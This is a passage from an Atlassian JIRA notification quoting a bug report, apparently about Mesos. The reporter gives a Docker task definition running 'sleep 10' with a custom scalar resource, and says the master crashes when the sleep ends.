> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)